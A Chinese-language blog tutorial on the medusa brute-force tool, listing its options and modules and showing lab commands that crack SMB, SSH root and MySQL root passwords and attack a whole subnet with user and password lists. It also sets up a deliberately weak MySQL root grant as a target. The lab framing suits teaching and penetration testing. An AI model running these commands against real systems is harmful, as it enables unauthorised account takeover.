暴力破解-medusa(三)

2022年8月16日14:59:25 发表评论 325 views

1.1 medusa介绍

medusa(美杜莎)是一个速度快,支持大规模并行,模块化,爆破登陆,可以同时对多个主机,用户或是密码执行强力测试,medusa和hydra一样,同样属于在线破解工具,不同的是medusa的稳定性相较于hydra要好很多,但是支持的模块相对于hydra少一些,其中Kali Linux中自带medusa。

1.2 medusa使用

1.2.1 下载medusa

https://github.com/jmk-foofus/medusa/

http://foofus.net/goons/jmk/medusa/medusa.html

1.2.2 medusa参数解释

-h [TEXT]:目标IP
-u [TEXT]:用户名
-P [FILE]:密码文件
-e [n/s/ns]:n意为空密码,s意为密码与用户名相同
-M [TEXT]:模块执行名称
-t [NUM]:设定线程数量
-F:破解到一个正确的密码即退出
-H [FILE]:目标主机文件
-U [FILE]:用户名文件
-p [TEXT]:密码
-C [FILE]:组合条目文件
-O [FILE]:文件日志信息
-m [TEXT]:传递参数到模块
-d:显示所有的模块名称
-n [NUM]:使用非默认端口
-s:启用SSL
-r [NUM]:重试间隔时间,默认为3秒
-L:并行化,每个用户使用一个线程
-f:在任何主机上找到第一个账号/密码后停止破解
-q:显示模块的使用信息
-v [NUM]:详细级别(0-6)
-w [NUM]:错误调试级别(0-10)
-V:显示版本
-Z [TEXT]:继续扫描上一次

1.2.3 medusa所有模块

# medusa -d
cvs.mod : Brute force module for CVS sessions : version 2.0
ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
http.mod : Brute force module for HTTP : version 2.1
imap.mod : Brute force module for IMAP sessions : version 2.0
mssql.mod : Brute force module for M$-SQL sessions : version 2.0
mysql.mod : Brute force module for MySQL sessions : version 2.0
nntp.mod : Brute force module for NNTP sessions : version 2.0
pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
pop3.mod : Brute force module for POP3 sessions : version 2.0
postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
rexec.mod : Brute force module for REXEC sessions : version 2.0
rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
rsh.mod : Brute force module for RSH sessions : version 2.0
smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1
smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1
smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
snmp.mod : Brute force module for SNMP Community Strings : version 2.1
ssh.mod : Brute force module for SSH v2 sessions : version 2.1
svn.mod : Brute force module for Subversion sessions : version 2.1
telnet.mod : Brute force module for telnet sessions : version 2.0
vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
vnc.mod : Brute force module for VNC sessions : version 2.1
web-form.mod : Brute force module for web forms : version 2.1
wrapper.mod : Generic Wrapper Module : version 2.0

1.3 实验环境

序号 主机IP 主机系统 主机角色
1 192.168.10.180 Kali 攻击机
2 192.168.10.129 Windows 10 64位 攻击机
3 192.168.10.156 Windows 7 32位 被攻击机
4 192.168.10.80 Centos 7 64位 被攻击机

1.4 实例:使用medusa破解系统用户名密码

1.4.1 破解win7文件共享密码

1.4.1.1 前期准备

参考《暴力破解-hydra》1.4.1章节

1.4.1.2 破解smb文件密码

# medusa -M smbnt -h 192.168.10.157 -e ns -F -u pm -P m.txt

暴力破解-medusa(三)

1.4.2 破解ssh服务root密码

1.4.2.1 前期准备

参考《暴力破解-hydra》1.4.3章节

1.4.2.2 破解ssh远程密码

# medusa -M ssh -h 192.168.10.80 -e ns -F -u root -P m.txt

暴力破解-medusa(三)

1.4.3 同时破解多台主机

host.txt文件中是目标主机名称或者IP地址,user.txt文件中指定需要暴力破解的用户名,字典使用"m.txt" ,使用8000进程同时暴力破解:

1.4.3.1 准备环境

# for i in {1..254};do echo "192.168.10.${i}" >> host.txt;done
# vim host.txt
192.168.10.156
192.168.10.157
192.168.10.80
# vim user.txt
pm
root
administrator

1.4.3.2 进行暴力破解

# medusa -M smbnt -H ./host.txt -U ./user.txt -P m.txt -t 8 -O ./smbnt.log
# cat smbnt.log

暴力破解-medusa(三)

1.4.4 破解mysql的root密码

1.4.4.1 准备环境

[root@test ~]# mysql -uroot –p123456
mysql> grant all on *.* to 'root'@'%' identified by '123456' with grant option;

1.4.4.2 进行暴力破解

# medusa -M mysql -h 192.168.10.80 -e ns -F -u root -P m.txt

暴力破解-medusa(三)

weinxin
我的微信
如果有技术上的问题可以扫一扫我的微信
版权声明
1. 本网站名称:Leon的博客
2. 本站永久网址:https://blog.leonshadow.cn
3. 本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ632113590进行删除处理。
4. 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5. 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6. 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
liyang